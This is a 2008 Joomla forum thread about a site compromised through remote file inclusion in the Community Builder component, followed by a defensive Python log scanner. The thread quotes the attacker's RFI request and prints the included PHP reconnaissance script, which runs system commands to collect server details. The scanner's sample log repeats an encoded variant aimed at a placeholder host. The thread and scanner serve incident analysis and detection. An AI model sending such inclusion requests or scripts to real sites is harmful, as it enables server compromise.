Joomla.it Forum

Not only Joomla... => Security => : hs78 30 Sep 2008, 15:01:33

: Hack on Comprofiler (CB 1.1)
: hs78 30 Sep 2008, 15:01:33
Hi, my site (Joomla 1.0.15 stable) has been hacked with the following command:

200.93.147.155 - - [25/Sep/2008:04:56:49 +0200] "GET /mysitename//index.php?option=com_comprofiler&task=userProfile&user=http://urlcrack.txt??? HTTP/1.1" 200 37503 "-" "libwww-perl/5.805"

where urlcrack.txt contains the following text:

<?php
function ConvertBytes($number)
{
        $len = strlen($number);
        if($len < 4)
        {
                return sprintf("%d b", $number);
        }
        if($len >= 4 && $len <=6)
        {
                return sprintf("%0.2f Kb", $number/1024);
        }
        if($len >= 7 && $len <=9)
        {
                return sprintf("%0.2f Mb", $number/1024/1024);
        }
   
        return sprintf("%0.2f Gb", $number/1024/1024/1024);
                           
}

echo "narasaon
";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo "narasaon was here ..
";
echo "uname -a: $un
";
echo "os: $os
";
echo "uptime: $up
";
echo "id: $id1
";
echo "pwd: $pwd1
";
echo "php: $php1
";
echo "software: $sof1
";
echo "server-name: $name1
";
echo "server-ip: $ip1
";
echo "free: $free
";
echo "used: $used
";
echo "total: $all
";
exit;

Thanks to this code, hackers are able to send thousands of emails with our server.

Thanks in advance for any suggestion
: Re: Hack on Comprofiler (CB 1.1)
: Locu 03 Oct 2008, 11:25:54
Hi,
I think your site is bugged. This type of bug is called RFI (Remote File Inclusion).
 
/mysitename//index.php?option=com_comprofiler&task=userProfile&user=http://urlcrack.txt

As you can see above, the attacker has injected some malicious code into your site through the component "com_comprofiler". I suggest you purge that component and perform a full check on server files and databases.

Anyway, that script doesn't send email. It was used to retrieve some info and passwords from your server; then the hacker sent the emails using your data.


PS: look at this one:

http://www.milw0rm.com/exploits/5491

bye
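A defender's check for the pattern discussed in this thread, added here as an example and not code from the forum or from Community Builder: it scans Apache combined-format log lines (the format of the line quoted in the first post) for any query parameter whose value is a remote URL, which is the RFI signature visible in that request. The sample log is constructed; the host attacker.invalid in the third line is a hypothetical placeholder.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format (the format of the line quoted in the post).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def rfi_indicators(line):
    """Return (param, value) pairs whose value is a remote URL, the classic
    RFI signature; [] if the line is clean or not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    # parse_qsl also percent-decodes, so an encoded http%3A%2F%2F is caught.
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if v.lower().startswith(REMOTE_SCHEMES)]

def scan(lines):
    """Summarise every line that carries at least one RFI indicator."""
    report = []
    for line in lines:
        hits = rfi_indicators(line)
        if hits:
            m = LOG_RE.match(line)
            report.append({"ip": m.group("ip"), "ua": m.group("ua"),
                           "status": int(m.group("status")), "hits": hits})
    return report

# Constructed sample: the request from the post, a benign profile view,
# and a percent-encoded variant of the same attack (hypothetical host).
SAMPLE_LOG = [
    '200.93.147.155 - - [25/Sep/2008:04:56:49 +0200] "GET /mysitename//index.php'
    '?option=com_comprofiler&task=userProfile&user=http://urlcrack.txt??? HTTP/1.1"'
    ' 200 37503 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [25/Sep/2008:09:12:01 +0200] "GET /mysitename/index.php'
    '?option=com_comprofiler&task=userProfile&user=62 HTTP/1.1" 200 18211 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Sep/2008:01:03:44 +0200] "GET /mysitename/index.php'
    '?option=com_comprofiler&task=userProfile&user=http%3A%2F%2Fattacker.invalid%2Fc.txt%3F'
    ' HTTP/1.1" 200 37503 "-" "libwww-perl/5.805"',
]

if __name__ == "__main__":
    for entry in scan(SAMPLE_LOG):
        print(entry)
```

A status of 200 on a flagged line, as in the quoted request, means the server answered normally rather than rejecting the remote value, so those lines deserve the first look when checking whether the included file actually ran.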